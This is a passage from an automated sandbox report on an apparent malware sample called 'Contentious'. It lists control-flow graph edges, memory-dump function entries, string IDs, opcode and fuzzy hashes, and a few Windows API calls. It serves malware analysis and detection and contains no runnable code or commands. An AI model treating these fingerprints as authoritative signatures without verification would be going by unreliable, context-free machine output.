3119->3121 3122 15584b-155857 3119->3122 3185 1558d7 call 155a70 3120->3185 3186 1558d7 call 155a68 3120->3186 3130 155868-155872 3121->3130 3122->3130 3123 1558dd-1558e3 3124 1558e5-1558eb 3123->3124 3125 1558ef-1558f6 3123->3125 3128 155951-15599f 3124->3128 3129 1558ed 3124->3129 3189 1559a1 call 23821f80 3128->3189 3190 1559a1 call 23821f71 3128->3190 3191 1559a1 call 23822188 3128->3191 3129->3125 3133 155874-155883 3130->3133 3134 15589f-1558a3 3130->3134 3143 155885-15588c 3133->3143 3144 155893-15589d 3133->3144 3135 1558a5-1558ab 3134->3135 3136 1558af-1558b3 3134->3136 3139 1558ad 3135->3139 3140 1558f9-15594a 3135->3140 3136->3125 3141 1558b5-1558b9 3136->3141 3139->3125 3140->3128 3145 1559b7-1559db 3141->3145 3146 1558bf-1558d1 3141->3146 3143->3144 3144->3134 3153 1559e1-1559e3 3145->3153 3154 1559dd-1559df 3145->3154 3146->3125 3156 1559e5-1559e9 3153->3156 3157 1559f4-1559f6 3153->3157 3155 155a59-155a5c 3154->3155 3161 1559ef-1559f2 3156->3161 3162 1559eb-1559ed 3156->3162 3163 155a09-155a0f 3157->3163 3164 1559f8-1559fc 3157->3164 3161->3155 3162->3155 3168 155a11-155a38 3163->3168 3169 155a3a-155a3c 3163->3169 3165 155a02-155a07 3164->3165 3166 1559fe-155a00 3164->3166 3165->3155 3166->3155 3171 155a43-155a45 3168->3171 3169->3171 3175 155a47-155a49 3171->3175 3176 155a4b-155a4d 3171->3176 3172 1559a7-1559b0 3172->3145 3175->3155 3177 155a56 3176->3177 3178 155a4f-155a54 3176->3178 3177->3155 3178->3155 3185->3123 3186->3123 3187->3113 3188->3113 3189->3172 3190->3172 3191->3172 3192->3096 3193->3096 3194->3096 3195->3096 3196->3096
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hbq$Hbq
                                            • API String ID: 0-4258043069
                                            • Opcode ID: fc203e62944c27c0766eb15610af93af547e20619c604abb8720d1b872bd6c21
                                            • Instruction ID: bf59f0ae399a4d06a5d6d5cffd3fdad882abb38ab97a8532f89c4bff5acce911
                                            • Opcode Fuzzy Hash: fc203e62944c27c0766eb15610af93af547e20619c604abb8720d1b872bd6c21
                                            • Instruction Fuzzy Hash: DCB1BB30704650CFCB159B79C8A4B2E7BA3AF88316F158569E86ACF291DB34CC85DB91
                                            Function 00155C08 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3268 155c08-155c15 3269 155c17-155c1b 3268->3269 3270 155c1d-155c1f 3268->3270 3269->3270 3271 155c24-155c2f 3269->3271 3272 155e30-155e37 3270->3272 3273 155c35-155c3c 3271->3273 3274 155e38 3271->3274 3275 155dd1-155dd7 3273->3275 3276 155c42-155c51 3273->3276 3278 155e3d-155e75 3274->3278 3279 155ddd-155de1 3275->3279 3280 155dd9-155ddb 3275->3280 3277 155c57-155c66 3276->3277 3276->3278 3286 155c68-155c6b 3277->3286 3287 155c7b-155c7e 3277->3287 3296 155e77-155e7c 3278->3296 3297 155e7e-155e82 3278->3297 3281 155de3-155de9 3279->3281 3282 155e2e 3279->3282 3280->3272 3281->3274 3284 155deb-155dee 3281->3284 3282->3272 3284->3274 3288 155df0-155e05 3284->3288 3290 155c8a-155c90 3286->3290 3292 155c6d-155c70 3286->3292 3289 155c80-155c83 3287->3289 3287->3290 3305 155e07-155e0d 3288->3305 3306 155e29-155e2c 3288->3306 3293 155c85 3289->3293 3294 155cd6-155cdc 3289->3294 3298 155c92-155c98 3290->3298 3299 155ca8-155cc5 3290->3299 3300 155c76 3292->3300 3301 155d71-155d77 3292->3301 3304 155d9c-155d9e 3293->3304 3302 155cf4-155d06 3294->3302 3303 155cde-155ce4 3294->3303 3307 155e88-155e8a 3296->3307 3297->3307 3308 155c9c-155ca6 3298->3308 3309 155c9a 3298->3309 3341 155cce-155cd1 3299->3341 3300->3304 3310 155d8f-155d99 3301->3310 3311 155d79-155d7f 3301->3311 3330 155d16-155d39 3302->3330 3331 155d08-155d14 3302->3331 3312 155ce6 3303->3312 3313 155ce8-155cf2 3303->3313 3322 155da7-155da9 3304->3322 3314 155e1f-155e22 3305->3314 3315 155e0f-155e1d 3305->3315 3306->3272 3316 155e8c-155e9e 3307->3316 3317 155e9f-155ea6 3307->3317 3308->3299 3309->3299 3310->3304 3319 155d81 3311->3319 3320 155d83-155d8d 3311->3320 3312->3302 3313->3302 3314->3274 3324 155e24-155e27 3314->3324 3315->3274 3315->3314 3319->3310 3320->3310 3327 155dbd-155dbf 3322->3327 3328 155dab-155daf 3322->3328 3324->3305 3324->3306 3336 155dc3-155dc6 3327->3336 3328->3327 3335 155db1-155db5 3328->3335 3330->3274 3344 155d3f-155d42 3330->3344 3342 155d61-155d6f 3331->3342 3335->3274 3337 155dbb 3335->3337 3336->3274 3338 155dc8-155dcb 3336->3338 3337->3336 3338->3275 3338->3276 3341->3304 3342->3304 3344->3274 3346 155d48-155d5a 3344->3346 3346->3342
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,bq$,bq
                                            • API String ID: 0-2699258169
                                            • Opcode ID: 39d294b844b3606d4df5473b3e38216d548843ec1b346faa47a118ae4b4bd89f
                                            • Instruction ID: e7446bf1d8229dcf0c779a4733882397737f5b6a90676a76277d508cccd787cb
                                            • Opcode Fuzzy Hash: 39d294b844b3606d4df5473b3e38216d548843ec1b346faa47a118ae4b4bd89f
                                            • Instruction Fuzzy Hash: 97818035A00A05CFCB18CFA9C8A89A9B7B3FF89312B258169D825DF361D731ED45CB50
                                            Function 20CB24D8 Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8cq$TJcq
                                            • API String ID: 0-1920894394
                                            • Opcode ID: 31e0825464d9cf85685d0eeba1745402c917f9c29589b74408be91daf0bac7c1
                                            • Instruction ID: d8e98a0dfd809b3de8514b5ec5c27a37678e87abdbd4a5406e0af265ccf0391a
                                            • Opcode Fuzzy Hash: 31e0825464d9cf85685d0eeba1745402c917f9c29589b74408be91daf0bac7c1
                                            • Instruction Fuzzy Hash: CD514C75A002148FCB05DBA8C494EDEBBB6EF88320F155194E505EB3A5CB71DD45CBA1
                                            Function 00153428 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Xbq$Xbq
                                            • API String ID: 0-1243427068
                                            • Opcode ID: 3f3fd1017d055756772e3ac6e718f6a91e367f5661ae9f59d6f4a990d40400d0
                                            • Instruction ID: 81087b556c811570187ac1b09fb3f251c5eea4ce58858994a889f166b3d7606e
                                            • Opcode Fuzzy Hash: 3f3fd1017d055756772e3ac6e718f6a91e367f5661ae9f59d6f4a990d40400d0
                                            • Instruction Fuzzy Hash: 8131C671710324CBDF1D4A6A899427EA5D6ABC4392F144439DC36CB380DF74CE499761
                                            Function 20CB25B1 Relevance: 2.6, Strings: 2, Instructions: 101COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8cq$TJcq
                                            • API String ID: 0-1920894394
                                            • Opcode ID: 220b85a1dd969f93e7898a0f7c880a9aa094056489dc40bf173723c10f6060df
                                            • Instruction ID: 744614e3b087bc399eebb1cc4e1dff27a559af8e0d2eaddb9645950e385667be
                                            • Opcode Fuzzy Hash: 220b85a1dd969f93e7898a0f7c880a9aa094056489dc40bf173723c10f6060df
                                            • Instruction Fuzzy Hash: 19311875B001188FCB05DFA8C490E9EBBF2EF98321F155594E505AB3A6CB31ED85CBA0
                                            Function 20CB25E5 Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8cq$TJcq
                                            • API String ID: 0-1920894394
                                            • Opcode ID: ea03a0fe8b347270e441f12c87b36dba39f1976c9ec581949ec25c5bf6bac7f5
                                            • Instruction ID: f5f99ee709a96b60e8d0f18b623e3f44f0a5a1b677a0c3f78bb38974d7179b75
                                            • Opcode Fuzzy Hash: ea03a0fe8b347270e441f12c87b36dba39f1976c9ec581949ec25c5bf6bac7f5
                                            • Instruction Fuzzy Hash: D6311875B001188FCB45DFA8C490E9EBBF2EF98321F155594E505AF3A6CB31ED858BA0
                                            Function 00150C8F Relevance: 1.7, Strings: 1, Instructions: 406COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR^q
                                            • API String ID: 0-2625958711
                                            • Opcode ID: c4abd685cbfc12bda015716e2d8935a1e4886658ea8b851d320637629a351241
                                            • Instruction ID: cef8fddccd2f7368075f0d4e5784531fff6995fa305ac59a1675820eed60b874
                                            • Opcode Fuzzy Hash: c4abd685cbfc12bda015716e2d8935a1e4886658ea8b851d320637629a351241
                                            • Instruction Fuzzy Hash: 9B22C17494021ACFCB54DF64DC98B9DBBB2FB89302F1085A9D80AA7365DB346E85CF40
                                            Function 00150CA0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR^q
                                            • API String ID: 0-2625958711
                                            • Opcode ID: 10a16b57f4535b747dd3ddefbb285289663de6af3102ab480389af50a30f3947
                                            • Instruction ID: 264427963e33422b2dd23ceb540f933ce7ad814fc057f38d80535510e4d37fc0
                                            • Opcode Fuzzy Hash: 10a16b57f4535b747dd3ddefbb285289663de6af3102ab480389af50a30f3947
                                            • Instruction Fuzzy Hash: 3622A17494061ACFCB54DF64DC98B9DBBB2FB88312F1085A9D80AA7364DB346E95CF40
                                            Function 2042FA50 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 2042FB62
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2942494015.0000000020420000.00000040.00000800.00020000.00000000.sdmp, Offset: 20420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20420000_Contentious.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: b9d913b276a089f5ca8b3b8702fa03aa7a6f721e130e938d79cd2130b1676642
                                            • Instruction ID: 001cac7ddd18b2a8d5cab31fcfdf8d441cb21e84aacc85cd93d5a76afe995775
                                            • Opcode Fuzzy Hash: b9d913b276a089f5ca8b3b8702fa03aa7a6f721e130e938d79cd2130b1676642
                                            • Instruction Fuzzy Hash: 9E41AEB1D003099FDB14CFA9D994ADEBFB5FF48314F64822AE818AB210D774A945CF91
                                            Function 205122F0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                            Download Yara Rule
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 205123B1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2942973811.0000000020510000.00000040.00000800.00020000.00000000.sdmp, Offset: 20510000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20510000_Contentious.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 5fbad8c7066ab3bcf7ed5082c5d1edec63814b67692855f9d05ebd8a5d8b2cbf
                                            • Instruction ID: 8407516cbef5f3863c444d009a81ff9f98e1af9be937ee534ef79320079ad63f
                                            • Opcode Fuzzy Hash: 5fbad8c7066ab3bcf7ed5082c5d1edec63814b67692855f9d05ebd8a5d8b2cbf
                                            • Instruction Fuzzy Hash: 324149B5900309CFDB14CF99C488A9AFBF5FB88310F24C959D518AB361D778A981CFA0
                                            Function 204251B1 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2042523F
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2942494015.0000000020420000.00000040.00000800.00020000.00000000.sdmp, Offset: 20420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20420000_Contentious.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: c547ff997434e453ea314aac9bd8c8cb1862fe5a5195050159732d9200018098
                                            • Instruction ID: 79852c252758e6cf30e1a486fb406f3c31ce177909755888186b18bb3e290342
                                            • Opcode Fuzzy Hash: c547ff997434e453ea314aac9bd8c8cb1862fe5a5195050159732d9200018098
                                            • Instruction Fuzzy Hash: 1F21D2B5D002499FDB10CFA9D984AEEFBF5EB48320F14845AE958A3350C378A950DFA1
                                            Function 204251B8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2042523F
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2942494015.0000000020420000.00000040.00000800.00020000.00000000.sdmp, Offset: 20420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20420000_Contentious.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: ad6dc38da9920b635a113b30a1c31653f39cfa68a1bdf81ea557be1fcba921a4
                                            • Instruction ID: 86d77a72a7b882d4f029749e37f5a8ae97110743b6256f50a0bc216cf8b27ebd
                                            • Opcode Fuzzy Hash: ad6dc38da9920b635a113b30a1c31653f39cfa68a1bdf81ea557be1fcba921a4
                                            • Instruction Fuzzy Hash: C521C4B59003489FDB10CF9AD984ADEFBF8EB48320F14845AE958A3350D378A954CFA5
                                            Function 20514830 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 2051488D
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2942973811.0000000020510000.00000040.00000800.00020000.00000000.sdmp, Offset: 20510000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20510000_Contentious.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 0286bc2ca8f84b9c18079791f3bbdfc33c1d2e2c9b2a2036a5fa4718142954f9
                                            • Instruction ID: 4006c00ec2ab2407654f6680ee580bf0a6a3264c75cf432f6159cf3136c28604
                                            • Opcode Fuzzy Hash: 0286bc2ca8f84b9c18079791f3bbdfc33c1d2e2c9b2a2036a5fa4718142954f9
                                            • Instruction Fuzzy Hash: 581133B68003488FDB10CF99D485BDEFFF4EB48320F20855AD559A3201C3B4A984CFA0
                                            Function 205139D0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 2051488D
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2942973811.0000000020510000.00000040.00000800.00020000.00000000.sdmp, Offset: 20510000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20510000_Contentious.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 29d8d5ed009cc92284b3aed04c086e9d60553e0672564844851fce76723d7610
                                            • Instruction ID: 738664eb28a967ca888b8ae3e2f959b01ab43d574b6846ac1ecd85c9237f98a9
                                            • Opcode Fuzzy Hash: 29d8d5ed009cc92284b3aed04c086e9d60553e0672564844851fce76723d7610
                                            • Instruction Fuzzy Hash: 651115B19003499FDB20DF9AD885B9EFFF4EB48320F208459D518A7300C374A984CFA5
                                            Function 20CBFD30 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te^q
                                            • API String ID: 0-671973202
                                            • Opcode ID: cf04d7877be7e2ef56f893c7c2261f829f4ad4c76d49c08c19141086e3dd746c
                                            • Instruction ID: bfe2e6b24720cc24f3184bfc8d6cd85ee9501d2e2f5c833ce931d43243d315c0
                                            • Opcode Fuzzy Hash: cf04d7877be7e2ef56f893c7c2261f829f4ad4c76d49c08c19141086e3dd746c
                                            • Instruction Fuzzy Hash: 06618175E00218CFDB54DFA9C890A9DBBB2FF88301F20816AD819AB355DB346986CF40
                                            Function 0015A650 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (o^q
                                            • API String ID: 0-74704288
                                            • Opcode ID: 0b560e5570766feb49bd2eb8963b42425b3be853f456e2e8ff38582324f96e41
                                            • Instruction ID: 59d36eedcf58dea45f23d931b85be74c2e7f3b997a29162288f589c9ad9f0cff
                                            • Opcode Fuzzy Hash: 0b560e5570766feb49bd2eb8963b42425b3be853f456e2e8ff38582324f96e41
                                            • Instruction Fuzzy Hash: 4641D0357002448FCB159B78D8546AE7BF2BFC8311F644269E91ADB7A1CF318D46CBA1
                                            Function 20CB29F0 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hbq
                                            • API String ID: 0-1245868
                                            • Opcode ID: a8b48dabcf349699d2dc573c9f93493cafbb8d6a6b8e7c2cc6032a62451fa48a
                                            • Instruction ID: bce2ff834bb271e621c1b2fe2c58139ee272fb5879092daa1da7ec99653fd2a0
                                            • Opcode Fuzzy Hash: a8b48dabcf349699d2dc573c9f93493cafbb8d6a6b8e7c2cc6032a62451fa48a
                                            • Instruction Fuzzy Hash: 95412271B052448FCB05EBB88850AAE7FF6EFC9300B2041BDE209DB256DA348D06CB91
                                            Function 20CB2B30 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hbq
                                            • API String ID: 0-1245868
                                            • Opcode ID: 8d9cd748bbfe9bd1c2b8c17200d8a48f4db699175e573d6a4fd882aba5f8b6fd
                                            • Instruction ID: b052b4c8247c132901a9eb441c6ef4bc6f63e1ba5ee6731490df69fad91ba008
                                            • Opcode Fuzzy Hash: 8d9cd748bbfe9bd1c2b8c17200d8a48f4db699175e573d6a4fd882aba5f8b6fd
                                            • Instruction Fuzzy Hash: DC31F5346042449FCB059FB8C460A9E7FB2FFC6310B2481AAD50ACB2A6DE394D4BCB51
                                            Function 00151F61 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: T
                                            • API String ID: 0-2145084337
                                            • Opcode ID: 948e8aebe8cfd96990415ecb7756f213ab026a9970e3e37dc22ffc0eaf6ef7f9
                                            • Instruction ID: 10c1a007c1a757b789debc3e7d1125272a4d9498067b4960797d081ecb76e5cb
                                            • Opcode Fuzzy Hash: 948e8aebe8cfd96990415ecb7756f213ab026a9970e3e37dc22ffc0eaf6ef7f9
                                            • Instruction Fuzzy Hash: 0021C274C052498FCB01EFB8D8455EDBFF1BF4A301F10516AD809B7260EB345A99CBA1
                                            Function 0015A818 Relevance: .4, Instructions: 414COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 438172829de63e318b03d81134eaaf5718fcca313e5eac4076d0a2447076baf5
                                            • Instruction ID: 1e9186baae1e0da9781b48f52cadeb6791d4ca2499c717e04d861b257822fada
                                            • Opcode Fuzzy Hash: 438172829de63e318b03d81134eaaf5718fcca313e5eac4076d0a2447076baf5
                                            • Instruction Fuzzy Hash: F7F13F75A40114CFCB04CF6CC8949ADBBF6FF88312B5A8159E925AB361CB35EC85CB91
                                            Function 00157438 Relevance: .2, Instructions: 201COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: db45f59650919c95d0134ae10b8f50183840b0ff90e641431c173104b92ba716
                                            • Instruction ID: 97d860ec6b0e994a277042c16b9ba2ead9f3aa9eaa2b1a35f8b6c86dee97d6fd
                                            • Opcode Fuzzy Hash: db45f59650919c95d0134ae10b8f50183840b0ff90e641431c173104b92ba716
                                            • Instruction Fuzzy Hash: D5711734718605CFDB15DF28E899AA97BE6AF49702F1500A9E826CF3B1DB70DC45CB90
                                            Function 20CB2CC7 Relevance: .2, Instructions: 175COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b4f08b1745195a19c343bd9f2f41eca4befaaa16b6cc17145fcaa303556f536e
                                            • Instruction ID: c7394218dab0a6a51705c8371069ea21aaa0842cd560ead79658b08861fb77b9
                                            • Opcode Fuzzy Hash: b4f08b1745195a19c343bd9f2f41eca4befaaa16b6cc17145fcaa303556f536e
                                            • Instruction Fuzzy Hash: DD510FB2B046019FC3048BB9DC949ABBBF9FBC9320B14866EE569C7791D631DC05C760
                                            Function 0015CEC7 Relevance: .2, Instructions: 173COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e51f4c14455d0a15c0ee7441a9f694ae1f5d2f5e158c8d567ad111145c7d4cf2
                                            • Instruction ID: ced8ea811b951e292742631370732bb63ac3d15dc57e7d60ab9b946e766d00d2
                                            • Opcode Fuzzy Hash: e51f4c14455d0a15c0ee7441a9f694ae1f5d2f5e158c8d567ad111145c7d4cf2
                                            • Instruction Fuzzy Hash: DA51ADB0025A4A9FE2002B20FDAC16A7BB1FF4F7277456D44B00FA58729F7855C9CB22
                                            Function 0015CED8 Relevance: .2, Instructions: 167COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9a2f97bce1a36edb681d00e8ad3dcb45db02e5ecf2ce92c4674172642071811b
                                            • Instruction ID: 9e32c981272b895c42c62eab9a5b756c814de1fe2b58fba6076777fe12c55913
                                            • Opcode Fuzzy Hash: 9a2f97bce1a36edb681d00e8ad3dcb45db02e5ecf2ce92c4674172642071811b
                                            • Instruction Fuzzy Hash: 82518EB0025B4B9FE2002B20FDAC12ABBB5FF4F7277456D44B10FA58659F7854C58A62
                                            Function 0015D59F Relevance: .2, Instructions: 154COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fec817017880c0081cb8287fcea40b27968d628bc9d495ecd2baf85cbbc0fc91
                                            • Instruction ID: e0b4a2eb574d7e83d460f750a4843e837f2a272fbc7f5e09841848b20dfc2390
                                            • Opcode Fuzzy Hash: fec817017880c0081cb8287fcea40b27968d628bc9d495ecd2baf85cbbc0fc91
                                            • Instruction Fuzzy Hash: F1611274D01218DFDB15DFA4D954BADBBB2FF88306F208129D809AB394DB346A86CF41
                                            Function 0015CD10 Relevance: .1, Instructions: 140COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 304b66655ecb039dd1205f3ec3802942b78f730c812976b08a378fe7aa19a000
                                            • Instruction ID: f044a82d51567ae506503ebe8022adcc3f5ff4439fb50128b1b7405fec05c2a8
                                            • Opcode Fuzzy Hash: 304b66655ecb039dd1205f3ec3802942b78f730c812976b08a378fe7aa19a000
                                            • Instruction Fuzzy Hash: 7C518274E012089FDB44DFA9D9949DDBBF2BF89300F249169E819AB365DB30A905CF50
                                            Function 00153908 Relevance: .1, Instructions: 134COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 93895a614e7cb355bdd36038c0bbbb62d79595a9556e4c37cc72923dca0bf02c
                                            • Instruction ID: 554de42a600454ccdcf5a8818d8340fe2ed0aeb8f442977a9616ab275c230d00
